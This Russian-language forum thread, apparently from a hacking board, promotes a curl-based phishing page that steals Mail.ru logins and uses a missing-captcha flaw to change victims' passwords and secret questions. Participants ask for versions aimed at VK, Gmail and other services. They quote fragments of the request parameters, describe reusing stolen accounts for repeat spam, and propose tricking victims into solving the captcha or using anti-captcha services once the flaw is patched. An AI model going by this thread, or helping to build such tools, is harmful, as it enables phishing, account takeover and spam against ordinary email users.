В общем, ситуация банальна. Допустим, есть у нас фейк, и нам удалось заманить юзверя на него. Он зашел, ввел свой логин, пасс, но вот проблема - каким-то образом он догадался о том, что его авторизационные данные ушли в левые руки. Что бы вы сделали на его месте? Я бы, например, сразу поменял пароль. Вот скрипт, который в принципе из себя ничего не представляет - обычный фейк, работающий через curl, причем слепленный на коленке. Единственное - он автоматически изменяет пароль на мыло юзверя на заданный вами, а также секретный вопрос (обязательное условие, т. к. через него все реализовано). При желании, алгоритм можно доработать - это уже к спецам.

Скачать (http://slil.ru/28125723)

UPD: скрипт потерял свою актуальность. Респект кодерам Mail.ru ;)

неплохо))) после можно будет протестить) лови +

полезно, +)

интересно. лови плюс. будем тестить )))

как никогда актуалиная вещь в наше время!
автор молодец!

Спс вот те +

спасибо автору, надо доработать под одноклассники, вконтакте и gmail.....

++++ :)

p.s. ТС, я это, сменил твой скрипт чтоб он менял только ответ на секретный вопрос, а пароль не менял, оставлял прежним... надеюсь сие не есть плагиат... :confused:

я это, сменил твой скрипт чтоб он менял только ответ на секретный вопрос, а пароль не менял, оставлял прежним... надеюсь сие не есть плагиат... :confused:
Да нет, там всего то пара функций) а по поводу вопроса - а смысл? ты и так палишься.
КСТАТИ
в скрипте есть небольшая недоработка - тестирование показало, что пассворды из символов, отличающихся от латиницы и цифр (пробелы, кириллица) не проходят. нужно перекодировать эти символы в html_chars. Пока нет ни времени, ни желания дописывать, как только появятся - реализую еще пару функций.
Подумал тут насчет ответа на секретный вопрос. А хорошая идея, учитывая возможность того, что юзер не догадается, что попал на фейк. Будет и дальше юзать свой мыльник, пока в ответственный момент... ну дальше все понятно)

Да нет, там всего то пара функций) а по поводу вопроса - а смысл? ты и так палишься.
КСТАТИ
в скрипте есть небольшая недоработка - тестирование показало, что пассворды из символов, отличающихся от латиницы и цифр (пробелы, кириллица) не проходят. нужно перекодировать эти символы в html_chars. Пока нет ни времени, ни желания дописывать, как только появятся - реализую еще пару функций.
Подумал тут насчет ответа на секретный вопрос. А хорошая идея, учитывая возможность того, что юзер не догадается, что попал на фейк. Будет и дальше юзать свой мыльник, пока в ответственный момент... ну дальше все понятно)


у меня тестирование показало, что скрипт меняет секретный вопрос на все ящики кроме моего главного ящика, то ли скрипт узнает хозяина :D , то ли еще что, но сколько я не бился над ним, и так и сяк изменял, результат ноль. На другие ящики меняет, а на мой главный не меняет.
Сегодня будут тестить скрипт, чтоб он и секретный вопрос оставлял прежним, а ответ на вопрос менял... ))))

В общем в идеальном варианте скрипт незаменим, если он будет менять только ответ на секретный вопрос, а сам секретный вопрос и пароль оставлять прежним :) , думаю можно это сообразить...
если получится, скину сюда,
если не получится, дождусь тебя ;)

спс, полезный скриптик, попробую в действии...

Весьма неплохо. Тестим.

под яшку и рамбер ктось могет переделать?

Хорошая штука! Пригодится

Хе, давно уже так меняю пароли на mail.ru.
Действительно штука полезная, только геморройно чуть-чуть.

Плиз, отпишите что менять в скрипте, что бы пароль не менял, а только выводил в тхт?
/и может кто посоветует халявный хост? А то свой на "Холме" забыл... =)/

полезно тестим... тс можно такое с vk сотворить?

хороший скрипт. пригодится, тс, молодец.

а не посоветуете ли просто софт, работающий с листингом мыло:пас и меняющий пароли и секретный вопрос на ящиках?

такие дела, ребята
Будущий секретный вопрос можно писать без пробелов, только латинские буквы и цифры, знак подчеркивания.

А если нужно ввести контрольным вопросом русские буквы и пробелы?) Возможно?

И еще вопрос, насчет пропускной способности. Если, предположим, 100 мыл в минуту, то будет ли скрипт корректно все обрабатывать

хорошая вещь... спасибо автору за труд. как небуть попробую. Для вконтакте хотелось бы такую же хрень.может есть ?

Насчет ВК - связываться с ним неохота :) Если когда-нибудь заинтересуюсь - попробую написать что-нибудь подобное для ВК, но не в ближайшее время. Вполне возможно, что у кого-то такое уже есть - ищите ;)

Идея супер, так держать!

я конечно не тестил- но вопрос в следующем- там-же при смене пасса- каптча?- ткните меня плиз носом где в скрипте она обходиться?

2Kusto: ну так а что тебе мешает просмотреть исходники? :) Или хотя бы внимательнее прочитать шапку топика. Всё дело в секретном вопросе.

Планирую написать скрипт, парсящий ответ от сервера и оставляющий вопрос старым, но заменяющий ответ на него и, опционально - пароль от ящика. Если ни у кого не появится желания сделать это быстрее меня и выложить рядом ;)

2Kusto: ну так а что тебе мешает просмотреть исходники? :) Или хотя бы внимательнее прочитать шапку топика. Всё дело в секретном вопросе.

Я один это вижу?
http://i073.radikal.ru/0910/f1/71cccc77f277.jpg
конечно я вижу исходники и строчку

$p_url="http://win.mail.ru/cgi-bin/userinfo";
$p_data = "domain=&ID=&Count=&Password_Question=&Password_CustomQuestion=$qws&Password_Answer=$anv&Email=&RemindPhone=&oldPswd=$pwd&Save=+%D1%EE%F5%F0%E0%ED%E8%F2%FC+"

поэтому и спросил где тут каптча передаеться?
Насколько я понял счас таким образом отправляються данные (кстати мыло левое на котором проверял)

domain=&ID=UprPnBej&Count=1&browserData=screen--%60top%60%3A%600%60%2C%60height%60%3A

%60768%60%2C%60width%60%3A%601024%60%2C

%60left%60%3A%600%60%2C%60colorDepth%60%3A

%6032%60%2C%60pixelDepth%60%3A

%6032%60%2C%60availWidth%60%3A
.
.
.
%28Windows%3B+ru%29%60%2C%60appCodeName
.
.
.
%60%3A%60Mozilla%60%2C%60appName%60%3A

%0Aflash--%60version%60%3A%6010.0.32%60%0D

%0A&Password_Question=&Password_CustomQuestion=Здесьвопрос&
Password_Answer=ЗдесьОтвет&Email=&RemindPhone=&x_reg_id=regV3_Rqwansax
&security_image_word=ЗДЕСЬОТВЕТНАКАП ТЧУ
&oldPswd=СтарыйПасс&Save=+%D1%EE%F5%F0%E0%ED%E8%F2%FC+

Считаю что данный скрипт бесполезен. Акки получаются одноразовыми

1. Не каждый юзер меняет пасс после перехода на фейк, а если же ему сменить пасс то он первый делом сообщит об этом всем свои друзьям (я бы так лично сделал) и никто спаму уже не поверит
2. Возможно пасс не сменят даже после спама - лично я чекаю акки месячной давности и неплохой выхлоп получился при повторном спаме ;)
3. Тот же ретрив даже через полгода, для повторного проспама.
4. Дополнительный кипишь админам! Всякие блондинки их засыпят сообщениями о взломе их анкет.

В общем не вижу логики менять пароль.

Считаю что данный скрипт бесполезен. Акки получаются одноразовыми

1. Не каждый юзер меняет пасс после перехода на фейк, а если же ему сменить пасс то он первый делом сообщит об этом всем свои друзьям (я бы так лично сделал) и никто спаму уже не поверит
2. Возможно пасс не сменят даже после спама - лично я чекаю акки месячной давности и неплохой выхлоп получился при повторном спаме ;)
3. Тот же ретрив даже через полгода, для повторного проспама.
4. Дополнительный кипишь админам! Всякие блондинки их засыпят сообщениями о взломе их анкет.

В общем не вижу логики менять пароль.
Ты не в теме))) Не все вконтактами интересуються)) Вообщето скрипт для мыла и отношение к соцсети неимеет никакого.
P.S.Помоему он неактуален

Считаю что данный скрипт бесполезен. Акки получаются одноразовыми

1. Не каждый юзер меняет пасс после перехода на фейк, а если же ему сменить пасс то он первый делом сообщит об этом всем свои друзьям (я бы так лично сделал) и никто спаму уже не поверит
2. Возможно пасс не сменят даже после спама - лично я чекаю акки месячной давности и неплохой выхлоп получился при повторном спаме ;)
3. Тот же ретрив даже через полгода, для повторного проспама.
4. Дополнительный кипишь админам! Всякие блондинки их засыпят сообщениями о взломе их анкет.

В общем не вижу логики менять пароль.

ты конкретно не в теме))))))), что мешает тебе изменить скрипт, чтоб он не менял пароль ????

например:
$NEWpwd = "$Password";

И пароль не сменится.

P.S. считаю, что руникс не несет ответственности за кривые руки скрипткидди.

Приношу всем свои извинения - да, скрипт неактуален и может использоваться только как фейк для сбора логинов и паролей. Видимо, программисты mail.ru решили испортить жизнь фишерам.
2Kusto: спасибо, что открыл глаза.
2satana-fu: теперь значение $NEWpwd не имеет значения, сорри за тавтологию. скрипт будет работать как обыкновенный фейк.

UPD: скрипт потерял свою актуальность. Респект кодерам Mail.ru ;)
2 r00nix Настоящие кодеры просто так нездаються))) Если абверы майлру прочитав твое сообщение поставили каптчу то тогда мож стоит тебе тоже сделать один шаг вперед?)))(мог бы и я доработать скрипт но это былоб как бы нарушение авторских правв)) Короче даю подсказку в нашем фишинговом письме надо просто каптчу вывести в тело письма- и написать следующий текст типа : вы или кто то другой подписались на ваш ящик на рассылку сайта gey.ru и для того чтоб подтвердить или отказаться от рассылки ВВЕДИТЕ КАПТЧУ изображонную на картинке и нажмите кнопку "Отказаться" или "Подтвердить" ну а дальше все по схеме)))

Либо типа перейдите по ссылке и на другом листе фейка сделать- вы уверенны что хотите отказаться от рассылки? если да ВВЕДИТЕ КАПТЧУ и нажмите "Подтвердить"
(ну что..... майловци тебе бросили вызов- дерзай)))

Вот те подсказка http://win.mail.ru/cgi-bin/x_get_image?&x_reg_id=regV3_W3Zr9vca
В отправке данных на сервер мы так-же можем видеть параметр x_reg_id
P.S. Пользуясь случаем хочу передать работникам mail.ru огромный привет и поблагодарить их за их титанический труд))

2 r00nix Настоящие кодеры просто так нездаються)))
Понимаешь в чем дело.. этот скрипт был все-таки написан не с целью облапошивания и отметания ящиков у ни в чем не повинных пользователей. Он демонстрировал одну уязвимость именно в коде mail.ru - а именно, отсутствие капчи при изменении секретного вопроса. То, что ты предлагаешь, я конечно реализую, как только выдастся пара свободных минут - но это будет уже не уязвимость сервиса, это будет уязвимость мозгов пользователей, так называемая СИ. Так можно и банковские аккаунты угонять - и часто так и делают, вместо грамотного АЗ предоставляя юзеру написанный забесценок инжект, который внешне частично изменяет поведение сервиса - просит юзера ввести дополнительную инфу etc. Моя же цель - это не обман, это указание кодерам на их ошибки. Потому и уважение к ним проявляется, когда они их таки закрывают.
Но, как я уже сказал, твоя идея мне интересна, и я попробую ее реализовать)) И кстати, копирайты - это всего лишь желание остаться в памяти, весь исходный код распространяется под GPL (при необходимости могу прикрепить ее текст к исходнику).

Он демонстрировал одну уязвимость именно в коде mail.ru - а именно, отсутствие капчи при изменении секретного вопроса. То, что ты предлагаешь, я конечно реализую, как только выдастся пара свободных минут - но это будет уже не уязвимость сервиса, это будет уязвимость мозгов пользователей, так называемая СИ.
Не нравится СИ? В чём проблема прикрутить любой из сервисов антикапчи? Капча там достаточно простая, не как при реге hotmail.com)

майл.ру уже пафиксили эту штукенцию( а жаль(